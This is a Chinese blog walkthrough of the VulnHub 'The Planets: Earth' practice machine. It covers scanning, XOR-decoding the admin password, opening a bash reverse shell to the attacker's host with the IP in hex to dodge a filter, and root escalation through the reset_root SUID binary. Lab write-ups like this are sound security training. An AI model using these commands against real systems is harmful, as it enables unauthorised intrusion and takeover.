VulnHub日记(十五): THE PLANETS: EARTH

最新推荐文章于 2023-11-23 19:21:38 发布
最新推荐文章于 2023-11-23 19:21:38 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: VlunHub日记 文章标签: web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/121545612
版权

参考链接

Vulnhub:THE PLANETS: EARTH
参考博客

开始练习

本机ip:192.168.56.102
目的机ip:192.168.56.136

fping -aqg 192.168.56.0/24

在这里插入图片描述

nmap 扫描主机

nap-A -v -p- 192.168.56.136


先将域名写入host文件,访问80和443端口,并进行目录扫描

dirsearch -u https://terratest.earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,html,txt,zip,bak
dirsearch -u http://terratest.earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,html,txt,zip,bak

80上:
在这里插入图片描述
同时nmap扫描到443口有robots.txt先查看
在这里插入图片描述
手动测试后缀,发现testingnotes.txt文件
在这里插入图片描述

知道了在80端口的服务使用的是异或,且有一个测试文档terra.txt,用户名是terra

将之前有的字段任选一个和terra.txt进行异或,16进制解码,获得密码

#XOR.py
import binascii
data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1,16) ^ int(f,16)))

在这里插入图片描述
在这里插入图片描述
用terra和获取的密码登录/admin
在这里插入图片描述
是执行命令窗口,尝试直接弹shell,没有成功
在这里插入图片描述
直接输入ip地址时会被阻止,所以认定是对ip地址字段进行绕过,将ip地址转换为16进制,成功弹shell

bash -i >& /dev/tcp/0xc0.0xa8.0x38.0x66/4396 0>&1

在这里插入图片描述

在这里插入图片描述

/etc/earth_web下发现userFLAG
在这里插入图片描述
查找特权文件,发现reset_root特殊名称

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
运行,没成功
在这里插入图片描述
下载到本地调试

#本地开启监听保存收到的数据到文件reset_root
nc -nlvp 9995 >reset_root
#webshell上建立链接传输reset_root文件
nc 192.168.56.102 9995 < reset_root

在这里插入图片描述
在这里插入图片描述
本地调试程序,缺少文件

ltrace ./reset_root

在这里插入图片描述
靶机目录里也缺少三个文件中的两个,在webshell中创建文件,再次运行

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
cd/usr/bin
./reset_root

在这里插入图片描述
成功运行并修改了root密码为Earth

su
ls -al 
cd /root
cat root_flag.txt

在这里插入图片描述

Dawn_Xiiii
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实验室信息管理 实验室信息管理系统 v2.0
11-12
实验室信息管理系统(Lims)是一套集实验室试剂、耗材、设备于一体的在线共享的管理系统,主要应用于质检部门、高校、科研院所、公司研发中心、制药公司等机构,也可以运用于其
8planets.app:8Planets应用程序的网站
03-10
要求安装$ git clone https://github.com/pixyzehn/8planets.app.git$ cd 8planets.app/$ bundle install建造$ bundle exec jekyll build预览$ bundle exec jekyll serve执照代码是在下开源的。 内容是根据。
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3052
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
Vulnhub靶机】The Planets: Earth(行星-地球)
过期的秋刀鱼
09-16 271
使用strace工具检测reset_root文件的运行过程,如果没有可以下载安装下。发现除了常规的格式不能访问之外,最后还多了一个。只输入base64编码是不行的要结合解码命令。发现文件执行失败是因为少了这三个文件或目录。因此在靶机shell上创建这三个文件。通过三个秘钥去尝试找到用户名为。和上面的后缀格式拼接访问发现。没有可以运行sudo的文件。协议是没有结果的,需要对。在靶机shell上输入。来到登陆页面进行登陆。反弹到kali机器上。进入靶机终端进行创键。
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 998
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
Vulnhub】之THE PLANETS: EARTH
zg_111的博客
03-31 1288
XOR(异或)运算strace诊断调试工具nc传输文件。
渗透测试学习之靶机THE PLANETS: EARTH
xdbzdgx的博客
05-05 1688
前期准备 1.下载靶机The Planets: Earth ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.131 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- -A 192.168.88.131 发现开放了22,80,443端口,且443端口需要设置DNS解析。 没设置DNS解析时,我们尝试访问下,可以看到,状态是400
Vulnhub 系列 -- Earth
ch3cke的博客
03-21 3811
前期信息收集 nmap主机发现,主要探测存活主机的IP和以及主机开放的端口信息: ┌──(kali㉿kali)-[~] └─$ nmap -sP 192.168.139.135/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:19 EDT Nmap scan report for 192.168.139.2 Host is up (0.0017s latency). Nmap scan report for 192.168.139.13
渗透测试-vulnhub靶机 Earth
最新发布
2301_79441074的博客
11-23 89
dns解析 ,xor解码,
vlunhub系列之The Planets Earth
hanjinming110的博客
03-12 122
The Planets earth靶机
vulnhub 靶机 Earth
qq_44029310的博客
06-12 1197
一次打靶记录。
Vulnhub项目:Earth
Ays.Ie的博客
04-20 717
Vulnhub项目:Earth
Planets Earth Mars and the Moon 0.4.4
08-07
有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版!...
Planets Earth, Mars and the Moon
12-04
五百多mb,高清 Features: - Works on Unity 5 and Unity 4. ( 2 versions ) - Unity 5 only : 16K textured planet Earth ! - Ready-to-use prefabs that can be dynamically instantiated. - Highly ...
Planets-XCL:XCL Planets Software 用于批准成功的迁移操作
07-07
行星 XCL 该软件是长期保存项目 PLANETS ( ) 的最终产品之一,该项目于 2006 年至 2010 年在几个欧洲国家的机构中运行,其中大多数是图书馆、档案馆或大学,由欧盟委员会作为 FP6 计划资助。 在此背景下,科隆大学 ...
Planets Earth Mars and the Moon Untiy官方插件
03-16
Untiy官方插件星球
VulnHub靶场----Earth
qq_61670993的博客
10-18 479
Vulnhub靶场初体验
Vulnhub-Earth
m0_52016680的博客
09-10 822
Vulnhub类OSCP靶场
2-vulnhub靶场,Earth
qq_49078152的博客
08-14 1644
vulnhub,earth靶机练习
the planets: earth靶机
04-11
问题:关于行星:地球和静机。...回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值